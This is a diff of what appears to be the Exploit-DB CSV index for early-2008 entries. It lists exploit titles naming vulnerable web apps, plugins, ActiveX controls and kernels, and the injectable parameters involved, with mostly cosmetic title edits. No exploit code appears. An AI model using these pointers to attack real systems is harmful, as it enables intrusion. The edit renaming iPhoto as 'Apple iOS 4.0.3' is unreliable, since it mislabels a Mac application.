+4970,platforms/asp/webapps/4970.txt,"Web Wiz Forums 9.07 - (sub) Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0 4971,platforms/asp/webapps/4971.txt,"web wiz rich text editor 4.0 - Multiple Vulnerabilities",2008-01-23,BugReport.IR,asp,webapps,0 -4972,platforms/asp/webapps/4972.txt,"Web Wiz NewsPad 1.02 - (sub) Remote Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0 +4972,platforms/asp/webapps/4972.txt,"Web Wiz NewsPad 1.02 - (sub) Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0 4973,platforms/php/webapps/4973.txt,"Siteman 1.1.9 - (cat) Remote File Disclosure",2008-01-23,"Khashayar Fereidani",php,webapps,0 4974,platforms/windows/remote/4974.html,"Comodo AntiVirus 2.0 - ExecuteStr() Remote Command Execution Exploit",2008-01-23,h07,windows,remote,0 4975,platforms/php/webapps/4975.txt,"SLAED CMS 2.5 Lite - (newlang) Local File Inclusion",2008-01-23,The_HuliGun,php,webapps,0 4976,platforms/php/webapps/4976.txt,"Liquid-Silver CMS 0.1 - (update) Local File Inclusion",2008-01-23,Stack,php,webapps,0 -4977,platforms/cgi/webapps/4977.txt,"Aconon Mail 2004 - Remote Directory Traversal",2008-01-23,"Arno Toll",cgi,webapps,0 -4978,platforms/hardware/dos/4978.html,"Apple iPhone 1.1.2 - Remote Denial of Service",2008-01-24,c0ntex,hardware,dos,0 +4977,platforms/cgi/webapps/4977.txt,"Aconon Mail 2004 - Directory Traversal",2008-01-23,"Arno Toll",cgi,webapps,0 +4978,platforms/hardware/dos/4978.html,"Apple iOS 1.1.2 - Remote Denial of Service",2008-01-24,c0ntex,hardware,dos,0 4979,platforms/windows/remote/4979.html,"Move Networks Upgrade Manager Control - Buffer Overflow",2008-01-24,Elazar,windows,remote,0 4980,platforms/php/webapps/4980.txt,"Seagull 0.6.3 - (optimizer.php files) Remote File Disclosure",2008-01-24,fuzion,php,webapps,0 4981,platforms/windows/remote/4981.html,"ImageShack Toolbar 4.5.7 - FileUploader Class InsecureMethod (PoC)",2008-01-24,rgod,windows,remote,0 @@ -4629,17 +4630,17 @@ id,file,description,date,author,platform,type,port 4985,platforms/php/webapps/4985.txt,"flinx 1.3 - (category.php id) SQL Injection",2008-01-25,Houssamix,php,webapps,0 4986,platforms/windows/remote/4986.html,"Sejoong Namo ActiveSquare 6 - NamoInstaller.dll install Method Exploit",2008-01-25,plan-s,windows,remote,0 4987,platforms/windows/remote/4987.html,"Persits XUpload 3.0 - AddFile() Remote Buffer Overflow",2008-01-25,Elazar,windows,remote,0 -4988,platforms/asp/webapps/4988.txt,"candypress ecommerce suite 4.1.1.26 - Multiple Vulnerabilities",2008-01-25,BugReport.IR,asp,webapps,0 +4988,platforms/asp/webapps/4988.txt,"CandyPress eCommerce suite 4.1.1.26 - Multiple Vulnerabilities",2008-01-25,BugReport.IR,asp,webapps,0 4989,platforms/php/webapps/4989.txt,"simple forum 3.2 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2008-01-26,tomplixsee,php,webapps,0 4990,platforms/php/webapps/4990.txt,"phpIP 4.3.2 - Multiple SQL Injections",2008-01-26,"Charles Hooper",php,webapps,0 4991,platforms/php/webapps/4991.txt,"Bubbling Library 1.32 - Multiple Local File Inclusion",2008-01-26,Stack,php,webapps,0 -4992,platforms/php/webapps/4992.txt,"Wordpress Plugin WP-Cal 0.3 - editevent.php SQL Injection",2008-01-27,Houssamix,php,webapps,0 -4993,platforms/php/webapps/4993.txt,"Wordpress Plugin fGallery 2.4.1 - fimrss.php SQL Injection",2008-01-27,Houssamix,php,webapps,0 +4992,platforms/php/webapps/4992.txt,"WordPress Plugin WP-Cal 0.3 - editevent.php SQL Injection",2008-01-27,Houssamix,php,webapps,0 +4993,platforms/php/webapps/4993.txt,"WordPress Plugin fGallery 2.4.1 - fimrss.php SQL Injection",2008-01-27,Houssamix,php,webapps,0 4994,platforms/multiple/local/4994.sql,"Oracle 10g R1 - pitrig_drop PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0 -4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 - pitrig_truncate PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0 -4996,platforms/multiple/local/4996.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg PLSQL Injection (change sys password)",2008-01-28,sh2kerr,multiple,local,0 +4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 - PITRIG_TRUNCATE PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0 +4996,platforms/multiple/local/4996.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg PLSQL Injection (change sys Password)",2008-01-28,sh2kerr,multiple,local,0 4997,platforms/multiple/dos/4997.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg Buffer Overflow (PoC)",2008-01-28,sh2kerr,multiple,dos,0 -4998,platforms/windows/local/4998.c,"IrfanView 4.10 - '.fpx' Memory Corruption Exploit",2008-01-28,Marsu,windows,local,0 +4998,platforms/windows/local/4998.c,"Irfanview 4.10 - '.fpx' Memory Corruption Exploit",2008-01-28,Marsu,windows,local,0 4999,platforms/windows/remote/4999.htm,"MailBee Objects 5.5 - (MailBee.dll) Remote Insecure Method Exploit",2008-01-28,darkl0rd,windows,remote,0 5000,platforms/php/webapps/5000.txt,"phpMyClub 0.0.1 - (page_courante) Local File Inclusion",2008-01-28,S.W.A.T.,php,webapps,0 5001,platforms/php/webapps/5001.txt,"bubbling library 1.32 - dispatcher.php Remote File Disclosure",2008-01-28,Stack,php,webapps,0 @@ -4648,17 +4649,17 @@ id,file,description,date,author,platform,type,port 5004,platforms/windows/local/5004.c,"SafeNet IPSecDrv.sys 10.4.0.12 - Local kernel Ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0 5005,platforms/windows/remote/5005.html,"Chilkat Mail ActiveX 7.8 - (ChilkatCert.dll) Insecure Method Exploit",2008-01-29,darkl0rd,windows,remote,0 5006,platforms/php/webapps/5006.txt,"PHPCMS 1.2.2 - (parser.php) Remote File Disclosure",2008-01-29,DSecRG,php,webapps,0 -5007,platforms/php/webapps/5007.txt,"Mambo Component Newsletter - (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0 +5007,platforms/php/webapps/5007.txt,"Mambo Component NewsLetter - (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0 5008,platforms/php/webapps/5008.txt,"Mambo Component Fq - (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0 5009,platforms/php/webapps/5009.txt,"Mambo Component MaMML - (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0 5010,platforms/php/webapps/5010.txt,"Mambo Component Glossary 2.0 - 'catid' SQL Injection",2008-01-30,S@BUN,php,webapps,0 5011,platforms/php/webapps/5011.txt,"Mambo Component musepoes - (aid) SQL Injection",2008-01-30,S@BUN,php,webapps,0 -5012,platforms/php/webapps/5012.pl,"Connectix Boards 0.8.2 - template_path Remote File Inclusion Exploit",2008-01-30,Houssamix,php,webapps,0 -5013,platforms/php/webapps/5013.php,"Wordpress Plugin Adserve 0.2 - adclick.php SQL Injection",2008-01-30,enter_the_dragon,php,webapps,0 +5012,platforms/php/webapps/5012.pl,"Connectix Boards 0.8.2 - template_path Remote File Inclusion",2008-01-30,Houssamix,php,webapps,0 +5013,platforms/php/webapps/5013.php,"WordPress Plugin Adserve 0.2 - adclick.php SQL Injection",2008-01-30,enter_the_dragon,php,webapps,0 5014,platforms/php/webapps/5014.txt,"Mambo Component Recipes 1.00 - 'id' SQL Injection",2008-01-30,S@BUN,php,webapps,0 5015,platforms/php/webapps/5015.txt,"Mambo Component jokes 1.0 - (cat) SQL Injection",2008-01-30,S@BUN,php,webapps,0 5016,platforms/php/webapps/5016.txt,"Mambo Component EstateAgent 0.1 - SQL Injection",2008-01-30,S@BUN,php,webapps,0 -5017,platforms/php/webapps/5017.php,"Wordpress Plugin WassUp 1.4.3 - (spy.php to_date) SQL Injection",2008-01-30,enter_the_dragon,php,webapps,0 +5017,platforms/php/webapps/5017.php,"WordPress Plugin WassUp 1.4.3 - (spy.php to_date) SQL Injection",2008-01-30,enter_the_dragon,php,webapps,0 5018,platforms/php/webapps/5018.pl,"ibProArcade 3.3.0 - SQL Injection",2008-01-30,RST/GHC,php,webapps,0 5019,platforms/php/webapps/5019.txt,"Coppermine Photo Gallery 1.4.14 - Remote Command Execution Exploit",2008-01-30,waraxe,php,webapps,0 5020,platforms/php/webapps/5020.txt,"Joomla Component ChronoForms 2.3.5 - Remote File Inclusion",2008-01-30,Crackers_Child,php,webapps,0 @@ -4671,13 +4672,13 @@ id,file,description,date,author,platform,type,port 5029,platforms/php/webapps/5029.txt,"Mambo Component AkoGallery 2.5b - SQL Injection",2008-01-31,S@BUN,php,webapps,0 5030,platforms/php/webapps/5030.txt,"Mambo Component Catalogshop 1.0b1 - SQL Injection",2008-01-31,S@BUN,php,webapps,0 5031,platforms/php/webapps/5031.txt,"Mambo Component Restaurant 1.0 - SQL Injection",2008-01-31,S@BUN,php,webapps,0 -5032,platforms/windows/local/5032.c,"Total Video Player 1.03 - .m3u File Local Buffer Overflow",2008-02-01,"fl0 fl0w",windows,local,0 +5032,platforms/windows/local/5032.c,"Total Video Player 1.03 - '.m3u' File Local Buffer Overflow",2008-02-01,"fl0 fl0w",windows,local,0 5033,platforms/php/webapps/5033.txt,"LightBlog 9.5 - cp_upload_image.php Remote File Upload",2008-02-01,Omni,php,webapps,0 5034,platforms/php/webapps/5034.txt,"Joomla Component NeoReferences 1.3.1 - 'catid' SQL Injection",2008-02-01,S@BUN,php,webapps,0 -5035,platforms/php/webapps/5035.txt,"Wordpress Plugin dmsguestbook 1.7.0 - Multiple Vulnerabilities",2008-02-02,NBBN,php,webapps,0 +5035,platforms/php/webapps/5035.txt,"WordPress Plugin dmsguestbook 1.7.0 - Multiple Vulnerabilities",2008-02-02,NBBN,php,webapps,0 5036,platforms/windows/dos/5036.pl,"Titan FTP Server 6.03 - (USER/PASS) Remote Heap Overflow (PoC)",2008-02-02,securfrog,windows,dos,0 5037,platforms/php/webapps/5037.txt,"The Everything Development System Pre-1.0 - SQL Injection",2008-02-02,sub,php,webapps,0 -5039,platforms/php/webapps/5039.txt,"Wordpress Plugin Wordspew - SQL Injection",2008-02-02,S@BUN,php,webapps,0 +5039,platforms/php/webapps/5039.txt,"WordPress Plugin Wordspew - SQL Injection",2008-02-02,S@BUN,php,webapps,0 5040,platforms/php/webapps/5040.txt,"BookmarkX script 2007 - (topicid) SQL Injection",2008-02-02,S@BUN,php,webapps,0 5041,platforms/php/webapps/5041.txt,"phpShop 0.8.1 - SQL Injection / Filter Bypass",2008-02-02,"the redc0ders",php,webapps,0 5042,platforms/php/webapps/5042.txt,"BlogPHP 2 - 'id' Cross-Site Scripting / SQL Injection",2008-02-02,"Khashayar Fereidani",php,webapps,0 @@ -4691,20 +4692,20 @@ id,file,description,date,author,platform,type,port 5050,platforms/php/webapps/5050.pl,"A-Blog 2.0 - 'id' Cross-Site Scripting / SQL Injection",2008-02-03,"Khashayar Fereidani",php,webapps,0 5051,platforms/windows/remote/5051.html,"Yahoo! Music JukeBox 2.2 - AddButton() ActiveX Remote Buffer Overflow Exploit",2008-02-03,Elazar,windows,remote,0 5052,platforms/windows/remote/5052.html,"Yahoo! JukeBox MediaGrid - ActiveX mediagrid.dll AddBitmap() Buffer Overflow Exploit",2008-02-03,Elazar,windows,remote,0 -5053,platforms/php/webapps/5053.txt,"Wordpress Plugin st_newsletter - SQL Injection",2008-02-03,S@BUN,php,webapps,0 +5053,platforms/php/webapps/5053.txt,"WordPress Plugin st_newsletter - SQL Injection",2008-02-03,S@BUN,php,webapps,0 5054,platforms/hardware/dos/5054.c,"MicroTik RouterOS 3.2 - SNMPd snmp-set Denial of Service",2008-02-03,ShadOS,hardware,dos,0 5055,platforms/php/webapps/5055.txt,"Joomla Component Marketplace 1.1.1 - SQL Injection",2008-02-03,"SoSo H H",php,webapps,0 5056,platforms/php/webapps/5056.txt,"ITechBids 5.0 - (bidhistory.php item_id) SQL Injection",2008-02-04,QTRinux,php,webapps,0 5057,platforms/php/webapps/5057.txt,"XOOPS 2.0.18 - Local File Inclusion / URL Redirecting",2008-02-04,DSecRG,php,webapps,0 5058,platforms/php/webapps/5058.txt,"Mambo Component Awesom 0.3.2 - (listid) SQL Injection",2008-02-04,S@BUN,php,webapps,0 -5059,platforms/php/webapps/5059.txt,"Mambo Component Shambo2 - (Itemid) SQL Injection",2008-02-04,S@BUN,php,webapps,0 +5059,platforms/php/webapps/5059.txt,"Mambo Component Shambo2 - 'itemID' SQL Injection",2008-02-04,S@BUN,php,webapps,0 5060,platforms/php/webapps/5060.txt,"VHD Web Pack 2.0 - 'index.php' Local File Inclusion",2008-02-04,DSecRG,php,webapps,0 5061,platforms/php/webapps/5061.txt,"All Club CMS 0.0.1f - 'index.php' Local File Inclusion",2008-02-04,Trancek,php,webapps,0 5062,platforms/php/webapps/5062.txt,"RMSOFT Gallery System 2.0 - (images.php id) SQL Injection",2008-02-05,you_kn0w,php,webapps,0 -5063,platforms/windows/dos/5063.pl,"NERO Media Player 1.4.0.35b - .m3u File Buffer Overflow (PoC)",2008-02-05,securfrog,windows,dos,0 +5063,platforms/windows/dos/5063.pl,"NERO Media Player 1.4.0.35b - '.m3u' File Buffer Overflow (PoC)",2008-02-05,securfrog,windows,dos,0 5064,platforms/php/webapps/5064.txt,"All Club CMS 0.0.2 - 'index.php' SQL Injection",2008-02-05,ka0x,php,webapps,0 -5065,platforms/php/webapps/5065.txt,"Photokorn Gallery 1.543 - (pic) SQL Injection",2008-02-05,you_kn0w,php,webapps,0 -5066,platforms/php/webapps/5066.php,"Wordpress MU < 1.3.2 - active_plugins option Code Execution Exploit",2008-02-05,"Alexander Concha",php,webapps,0 +5065,platforms/php/webapps/5065.txt,"PhotoKorn Gallery 1.543 - (pic) SQL Injection",2008-02-05,you_kn0w,php,webapps,0 +5066,platforms/php/webapps/5066.php,"WordPress MU < 1.3.2 - active_plugins option Code Execution",2008-02-05,"Alexander Concha",php,webapps,0 5067,platforms/windows/dos/5067.pl,"dBpowerAMP Audio Player Release 2 - M3U File Buffer Overflow (PoC)",2008-02-05,securfrog,windows,dos,0 5068,platforms/php/webapps/5068.txt,"OpenSiteAdmin 0.9.1.1 - Multiple File Inclusion",2008-02-06,Trancek,php,webapps,0 5069,platforms/windows/remote/5069.pl,"dBpowerAMP Audio Player Release 2 - M3U File Buffer Overflow Exploit",2008-02-06,securfrog,windows,remote,0 @@ -4712,10 +4713,10 @@ id,file,description,date,author,platform,type,port 5071,platforms/php/webapps/5071.txt,"Astanda Directory Project 1.2 - (link_id) SQL Injection",2008-02-06,you_kn0w,php,webapps,0 5072,platforms/php/webapps/5072.txt,"Joomla Component Ynews 1.0.0 - 'id' SQL Injection",2008-02-06,Crackers_Child,php,webapps,0 5073,platforms/php/webapps/5073.txt,"Mambo Component com_downloads - SQL Injection",2008-02-06,S@BUN,php,webapps,0 -5074,platforms/php/webapps/5074.php,"Mihalism Multi Host Download - (Username) Blind SQL Injection",2008-02-06,Moubik,php,webapps,0 +5074,platforms/php/webapps/5074.php,"Mihalism Multi Host Download - 'username' Blind SQL Injection",2008-02-06,Moubik,php,webapps,0 5075,platforms/php/webapps/5075.txt,"osCommerce Addon Customer Testimonials 3.1 - SQL Injection",2008-02-07,"it's my",php,webapps,0 5076,platforms/php/webapps/5076.txt,"Mambo Component Sermon 0.2 - (gid) SQL Injection",2008-02-07,S@BUN,php,webapps,0 -5077,platforms/windows/local/5077.cpp,"Total Video Player 1.20 - .m3u File Local Stack Buffer Overflow",2008-02-07,"fl0 fl0w",windows,local,0 +5077,platforms/windows/local/5077.cpp,"Total Video Player 1.20 - '.m3u' File Local Stack Buffer Overflow",2008-02-07,"fl0 fl0w",windows,local,0 5078,platforms/windows/remote/5078.htm,"Backup Exec System Recovery Manager 7.0.1 - File Upload Exploit",2008-02-07,titon,windows,remote,0 5079,platforms/windows/remote/5079.c,"SapLPD 6.28 (Windows/x86) - Remote Buffer Overflow",2008-02-07,BackBone,windows,remote,515 5080,platforms/php/webapps/5080.txt,"Joomla Component com_doc - SQL Injection",2008-02-07,S@BUN,php,webapps,0 @@ -4728,8 +4729,8 @@ id,file,description,date,author,platform,type,port 5087,platforms/windows/remote/5087.html,"Microsoft DirectSpeechSynthesis Module - Remote Buffer Overflow",2008-02-09,rgod,windows,remote,0 5088,platforms/php/webapps/5088.py,"Limbo CMS 1.0.4.2 - Cuid cookie Blind SQL Injection",2008-02-09,The:Paradox,php,webapps,0 5089,platforms/php/webapps/5089.txt,"DomPHP 0.82 - 'index.php' Local File Inclusion",2008-02-09,Houssamix,php,webapps,0 -5090,platforms/php/webapps/5090.pl,"Open-Realty 2.4.3 - (last_module) Remote Code Execution Exploit",2008-02-09,Iron,php,webapps,0 -5091,platforms/php/webapps/5091.pl,"Journalness 4.1 - (last_module) Remote Code Execution Exploit",2008-02-09,Iron,php,webapps,0 +5090,platforms/php/webapps/5090.pl,"Open-Realty 2.4.3 - (last_module) Remote Code Execution",2008-02-09,Iron,php,webapps,0 +5091,platforms/php/webapps/5091.pl,"Journalness 4.1 - (last_module) Remote Code Execution",2008-02-09,Iron,php,webapps,0 5092,platforms/linux/local/5092.c,"Linux Kernel 2.6.17 <= 2.6.24.1 - 'vmsplice' Privilege Escalation (2)",2008-02-09,qaaz,linux,local,0 5093,platforms/linux/local/5093.c,"Linux Kernel 2.6.23 <= 2.6.24 - 'vmsplice' Privilege Escalation (1)",2008-02-09,qaaz,linux,local,0 5094,platforms/php/webapps/5094.txt,"Mambo Component Comments 0.5.8.5g - SQL Injection",2008-02-09,CheebaHawk215,php,webapps,0 @@ -4745,8 +4746,8 @@ id,file,description,date,author,platform,type,port 5104,platforms/php/webapps/5104.txt,"Joomla Component pcchess 0.8 - SQL Injection",2008-02-12,S@BUN,php,webapps,0 5105,platforms/php/webapps/5105.pl,"AuraCMS 2.2 - (gallery_data.php) SQL Injection",2008-02-12,DNX,php,webapps,0 5106,platforms/windows/remote/5106.html,"Citrix Presentation Server Client - WFICA.OCX ActiveX Heap Buffer Overflow Exploit",2008-02-12,Elazar,windows,remote,0 -5107,platforms/windows/local/5107.c,"Microsoft Office 2003 - (.wps) Stack Overflow (MS08-011)",2008-02-13,chujwamwdupe,windows,local,0 -5108,platforms/php/webapps/5108.txt,"Affiliate Market 0.1 Beta - (language) Local File Inclusion",2008-02-13,GoLd_M,php,webapps,0 +5107,platforms/windows/local/5107.c,"Microsoft Office 2003 - '.wps' Stack Overflow (MS08-011)",2008-02-13,chujwamwdupe,windows,local,0 +5108,platforms/php/webapps/5108.txt,"Affiliate Market 0.1 Beta - 'Language' Local File Inclusion",2008-02-13,GoLd_M,php,webapps,0 5109,platforms/php/webapps/5109.txt,"Joomla Component xfaq 1.2 - (aid) SQL Injection",2008-02-13,S@BUN,php,webapps,0 5110,platforms/windows/dos/5110.txt,"QuickTime 7.4.1 - QTPlugin.ocx Multiple Stack Overflow Vulnerabilities",2008-02-13,"laurent gaffié ",windows,dos,0 5111,platforms/windows/remote/5111.html,"IBM Domino Web Access Upload Module - SEH Overwrite",2008-02-13,Elazar,windows,remote,0 @@ -4760,12 +4761,12 @@ id,file,description,date,author,platform,type,port 5119,platforms/php/webapps/5119.txt,"Joomla Component Quiz 0.81 - (tid) SQL Injection",2008-02-14,S@BUN,php,webapps,0 5120,platforms/php/webapps/5120.pl,"Joomla Component mediaslide (albumnum) - Blind SQL Injection",2008-02-14,Inphex,php,webapps,0 5121,platforms/php/webapps/5121.txt,"LookStrike Lan Manager 0.9 - Remote File Inclusion / Local File Inclusion",2008-02-14,MhZ91,php,webapps,0 -5122,platforms/windows/dos/5122.pl,"Rosoft Media Player 4.1.8 - .m3u File Remote Buffer Overflow (PoC)",2008-02-14,securfrog,windows,dos,0 +5122,platforms/windows/dos/5122.pl,"Rosoft Media Player 4.1.8 - '.m3u' File Remote Buffer Overflow (PoC)",2008-02-14,securfrog,windows,dos,0 5123,platforms/php/webapps/5123.txt,"Scribe 0.2 - 'index.php' Local File Inclusion",2008-02-14,muuratsalo,php,webapps,0 5124,platforms/php/webapps/5124.txt,"freePHPgallery 0.6 - Cookie Local File Inclusion",2008-02-14,MhZ91,php,webapps,0 5125,platforms/php/webapps/5125.txt,"PHP Live! 3.2.2 - (questid) SQL Injection (1)",2008-02-14,Xar,php,webapps,0 -5126,platforms/php/webapps/5126.txt,"Wordpress Plugin Simple Forum 2.0-2.1 - SQL Injection",2008-02-15,S@BUN,php,webapps,0 -5127,platforms/php/webapps/5127.txt,"Wordpress Plugin Simple Forum 1.10-1.11 - SQL Injection",2008-02-15,S@BUN,php,webapps,0 +5126,platforms/php/webapps/5126.txt,"WordPress Plugin Simple Forum 2.0-2.1 - SQL Injection",2008-02-15,S@BUN,php,webapps,0 +5127,platforms/php/webapps/5127.txt,"WordPress Plugin Simple Forum 1.10-1.11 - SQL Injection",2008-02-15,S@BUN,php,webapps,0 5128,platforms/php/webapps/5128.txt,"Mambo Component Quran 1.1 - (surano) SQL Injection",2008-02-15,Don,php,webapps,0 5129,platforms/php/webapps/5129.txt,"TRUC 0.11.0 - 'download.php' Remote File Disclosure",2008-02-16,GoLd_M,php,webapps,0 5130,platforms/php/webapps/5130.txt,"AuraCMS 1.62 - Multiple SQL Injections",2008-02-16,NTOS-Team,php,webapps,0 @@ -4773,30 +4774,30 @@ id,file,description,date,author,platform,type,port 5132,platforms/php/webapps/5132.txt,"Joomla Component jooget 2.6.8 - SQL Injection",2008-02-16,S@BUN,php,webapps,0 5133,platforms/php/webapps/5133.txt,"Mambo Component Ricette 1.0 - SQL Injection",2008-02-16,S@BUN,php,webapps,0 5134,platforms/php/webapps/5134.txt,"Joomla Component com_galeria - SQL Injection",2008-02-16,S@BUN,php,webapps,0 -5135,platforms/php/webapps/5135.txt,"Wordpress Photo album Remote - SQL Injection",2008-02-16,S@BUN,php,webapps,0 +5135,platforms/php/webapps/5135.txt,"WordPress Photo album Remote - SQL Injection",2008-02-16,S@BUN,php,webapps,0 5136,platforms/php/webapps/5136.txt,"PHPizabi 0.848b C1 HFP1 - Remote File Upload",2008-02-17,ZoRLu,php,webapps,0 5137,platforms/php/webapps/5137.txt,"XPWeb 3.3.2 - (download.php url) Remote File Disclosure",2008-02-17,GoLd_M,php,webapps,0 5138,platforms/php/webapps/5138.txt,"Joomla Component astatsPRO 1.0 - refer.php SQL Injection",2008-02-18,ka0x,php,webapps,0 -5139,platforms/php/webapps/5139.txt,"Mambo Component Portfolio 1.0 - (categoryId) SQL Injection",2008-02-18,"it's my",php,webapps,0 -5140,platforms/php/webapps/5140.txt,"LightBlog 9.6 - (username) Local File Inclusion",2008-02-18,muuratsalo,php,webapps,0 -5141,platforms/windows/local/5141.c,"DESlock+ <= 3.2.6 - (list) Local Kernel Memory Leak (PoC)",2008-02-18,mu-b,windows,local,0 +5139,platforms/php/webapps/5139.txt,"Mambo Component Portfolio 1.0 - 'categoryId' SQL Injection",2008-02-18,"it's my",php,webapps,0 +5140,platforms/php/webapps/5140.txt,"LightBlog 9.6 - 'username' Local File Inclusion",2008-02-18,muuratsalo,php,webapps,0 +5141,platforms/windows/local/5141.c,"DESlock+ <= 3.2.6 - 'LIST' Local Kernel Memory Leak (PoC)",2008-02-18,mu-b,windows,local,0 5142,platforms/windows/dos/5142.c,"DESlock+ <= 3.2.6 - DLMFENC.sys Local Kernel Ring0 link list zero (PoC)",2008-02-18,mu-b,windows,dos,0 5143,platforms/windows/local/5143.c,"DESlock+ <= 3.2.6 - Local Kernel Ring0 link list zero SYSTEM Exploit",2008-02-18,mu-b,windows,local,0 5144,platforms/windows/local/5144.c,"DESlock+ <= 3.2.6 - DLMFDISK.sys Local kernel Ring0 SYSTEM Exploit",2008-02-18,mu-b,windows,local,0 5145,platforms/php/webapps/5145.txt,"Joomla Component com_pccookbook - (user_id) SQL Injection",2008-02-18,S@BUN,php,webapps,0 5146,platforms/php/webapps/5146.txt,"Joomla Component com_clasifier - 'cat_id' SQL Injection",2008-02-18,S@BUN,php,webapps,0 5147,platforms/php/webapps/5147.txt,"PHP-Nuke Module books SQL - 'cid' SQL Injection",2008-02-18,S@BUN,php,webapps,0 -5148,platforms/php/webapps/5148.txt,"XOOPS Module myTopics - (articleid) SQL Injection",2008-02-18,S@BUN,php,webapps,0 +5148,platforms/php/webapps/5148.txt,"XOOPS Module myTopics - 'articleId' SQL Injection",2008-02-18,S@BUN,php,webapps,0 5149,platforms/php/webapps/5149.txt,"sCssBoard - (pwnpack) Multiple Versions Remote Exploit",2008-02-18,Inphex,php,webapps,0 5150,platforms/hardware/remote/5150.txt,"Thecus N5200Pro NAS Server Control Panel - Remote File Inclusion",2008-02-18,Crackers_Child,hardware,remote,0 -5151,platforms/osx/dos/5151.pl,"Apple iPhoto 4.0.3 - DPAP Server Denial of Service",2008-02-18,"David Wharton",osx,dos,0 +5151,platforms/osx/dos/5151.pl,"Apple iOS 4.0.3 - DPAP Server Denial of Service",2008-02-18,"David Wharton",osx,dos,0 5152,platforms/multiple/dos/5152.sh,"X.Org xorg-server 1.1.1-48.13 - Probe for Files (PoC)",2008-02-19,vl4dZ,multiple,dos,0 5153,platforms/windows/remote/5153.asp,"Ourgame GLWorld 2.x - hgs_startNotify() ActiveX Buffer Overflow",2008-02-19,luoluo,windows,remote,0 5154,platforms/php/webapps/5154.txt,"PHP-Nuke Module Sections - (artid) SQL Injection",2008-02-19,S@BUN,php,webapps,0 5155,platforms/php/webapps/5155.txt,"PHP-Nuke Module EasyContent - (page_id) SQL Injection",2008-02-19,"Mehmet Ince",php,webapps,0 5156,platforms/php/webapps/5156.txt,"RunCMS Module MyAnnonces - 'cid' SQL Injection",2008-02-19,S@BUN,php,webapps,0 5157,platforms/php/webapps/5157.txt,"XOOPS Module eEmpregos - 'cid' SQL Injection",2008-02-19,S@BUN,php,webapps,0 -5158,platforms/php/webapps/5158.txt,"XOOPS Module classifieds - 'cid' SQL Injection",2008-02-19,S@BUN,php,webapps,0 +5158,platforms/php/webapps/5158.txt,"XOOPS Module Classifieds - 'cid' SQL Injection",2008-02-19,S@BUN,php,webapps,0 5159,platforms/php/webapps/5159.txt,"PHP-Nuke Modules Okul 1.0 - (okulid) SQL Injection",2008-02-20,"Mehmet Ince",php,webapps,0 5160,platforms/php/webapps/5160.txt,"Joomla Component com_hwdvideoshare - SQL Injection",2008-02-20,S@BUN,php,webapps,0 5161,platforms/php/webapps/5161.txt,"PHP-Nuke Module Docum - (artid) SQL Injection",2008-02-20,DamaR,php,webapps,0 @@ -4809,7 +4810,7 @@ id,file,description,date,author,platform,type,port 5168,platforms/php/webapps/5168.txt,"PHP-Nuke Modules Manuales 0.1 - 'cid' SQL Injection",2008-02-21,"Mehmet Ince",php,webapps,0 5169,platforms/php/webapps/5169.txt,"PHP-Nuke Module Siir - 'id' SQL Injection",2008-02-21,S@BUN,php,webapps,0 5170,platforms/php/webapps/5170.txt,"BeContent 031 - 'id' SQL Injection",2008-02-21,Cr@zy_King,php,webapps,0 -5171,platforms/php/webapps/5171.txt,"ossim 0.9.9rc5 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-02-21,"Marcin Kopec",php,webapps,0 +5171,platforms/php/webapps/5171.txt,"OSSIM 0.9.9rc5 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-02-21,"Marcin Kopec",php,webapps,0 5172,platforms/php/webapps/5172.txt,"PHP-Nuke Module NukeC 2.1 - (id_catg) SQL Injection",2008-02-21,DamaR,php,webapps,0 5173,platforms/php/webapps/5173.txt,"phpQLAdmin 2.2.7 - Multiple Remote File Inclusion",2008-02-22,RoMaNcYxHaCkEr,php,webapps,0 5174,platforms/php/webapps/5174.txt,"Quantum Game Library 0.7.2c - Remote File Inclusion",2008-02-22,RoMaNcYxHaCkEr,php,webapps,0 @@ -4826,15 +4827,15 @@ id,file,description,date,author,platform,type,port 5185,platforms/asp/webapps/5185.txt,"PORAR WebBoard - 'question.asp' SQL Injection",2008-02-25,xcorpitx,asp,webapps,0 5186,platforms/php/webapps/5186.txt,"PHP-Nuke Module Kose_Yazilari - (artid) SQL Injection",2008-02-25,xcorpitx,php,webapps,0 5187,platforms/asp/webapps/5187.txt,"MiniNuke 2.1 - (members.asp uid) SQL Injection",2008-02-25,S@BUN,asp,webapps,0 -5188,platforms/windows/remote/5188.html,"Rising Antivirus Online Scanner - Insecure Method Flaw Exploit",2008-02-25,"John Smith",windows,remote,0 -5189,platforms/php/webapps/5189.pl,"DBHcms 1.1.4 - Remote File Inclusion Exploit",2008-02-25,Iron,php,webapps,0 +5188,platforms/windows/remote/5188.html,"Rising AntiVirus Online Scanner - Insecure Method Flaw Exploit",2008-02-25,"John Smith",windows,remote,0 +5189,platforms/php/webapps/5189.pl,"DBHcms 1.1.4 - Remote File Inclusion",2008-02-25,Iron,php,webapps,0 5190,platforms/windows/remote/5190.html,"Move Networks Quantum Streaming Player Control - Buffer Overflow Exploit",2008-02-26,Elazar,windows,remote,0 -5191,platforms/multiple/dos/5191.c,"Apple Mac OSX xnu 1228.3.13 - IPv6-ipcomp Remote kernel Denial of Service (PoC)",2008-02-26,mu-b,multiple,dos,0 +5191,platforms/multiple/dos/5191.c,"Apple Mac OS X xnu 1228.3.13 - IPv6-ipcomp Remote kernel Denial of Service (PoC)",2008-02-26,mu-b,multiple,dos,0 5192,platforms/php/webapps/5192.pl,"Nukedit 4.9.x - Remote Create Admin Exploit",2008-02-26,r3dm0v3,php,webapps,0 5193,platforms/windows/remote/5193.html,"D-Link MPEG4 SHM Audio 